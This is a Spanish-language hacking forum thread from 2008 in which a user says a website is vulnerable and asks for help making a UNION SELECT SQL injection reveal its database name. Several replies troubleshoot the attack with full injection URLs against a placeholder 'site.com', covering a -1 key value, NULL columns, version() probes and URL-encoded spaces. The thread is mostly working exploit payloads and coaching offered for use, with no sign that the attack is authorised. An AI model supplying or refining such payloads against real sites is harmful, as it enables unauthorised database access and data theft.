Autor
|
Tema: Problema con UNION SELECT en SQL Injection (Leído 5,648 veces)
|
Mie2
Desconectado
Mensajes: 73
Se Hacker Es la MejoR DEfensas contra Los Atakes
|
bueno mi probemas es que tengo una web vuln me explico
es un ej site.com/hack.php?key=14800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
bueno se que la web tiene 28 columna pero cuado hago la inyeccion que seria esta
site.com/hack.php?key=14800 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
me dice los mismo no me da el nombre de la base de datos si no me explique aseto criticas gracias ayuda cual seria la inyeccion correcta o si nesecitan mas info graxx
|
|
« Última modificación: 22 Octubre 2008, 17:59 pm por sirdarckcat »
|
En línea
|
Mie2
|
|
|
berz3k
|
Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.
-berz3k.
|
|
|
En línea
|
|
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
hola, como dijo berz3k seguro estas usando una columna que no se muestra, para saber que columnas son mostradas deberias probar
site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database() avisa si funciono,
saludos!
|
|
|
En línea
|
|
|
|
1nc0d3
Desconectado
Mensajes: 8
El Hacking es un arte no es delincuencia!
|
Yo creo que has hecho mal en la injeccion :S
site.com/hack.php?key=-1+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Prueba asi y nos avisas si te resulta =]
Espero te haya servido!
|
|
« Última modificación: 29 Octubre 2008, 21:21 pm por 1nc0d3 »
|
En línea
|
1nc0d3! un hacker juega Callado!!!
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Ayuda con una union (sql injection)
Nivel Web
|
4rkn63l
|
0
|
3,197
|
12 Febrero 2011, 02:21 am
por 4rkn63l
|
|
|
Union Based Sql Injection
Nivel Web
|
Stuxnet
|
5
|
5,744
|
9 Febrero 2015, 13:08 pm
por Shell Root
|
|
|
Problema con <Select> Wordpress y Chrome
Desarrollo Web
|
Maurice_Lupin
|
2
|
2,350
|
2 Febrero 2015, 21:58 pm
por Maurice_Lupin
|
|
|
Not Acceptable!, problema en ejercicios de injection SQL
Hacking
|
Caroxh1
|
4
|
3,737
|
5 Febrero 2020, 17:32 pm
por WHK
|
|
|
Problema en ASP.NET Razor Pages Select asp-items
.NET (C#, VB.NET, ASP)
|
Albpous
|
1
|
5,007
|
17 Febrero 2024, 16:02 pm
por TickTack
|
|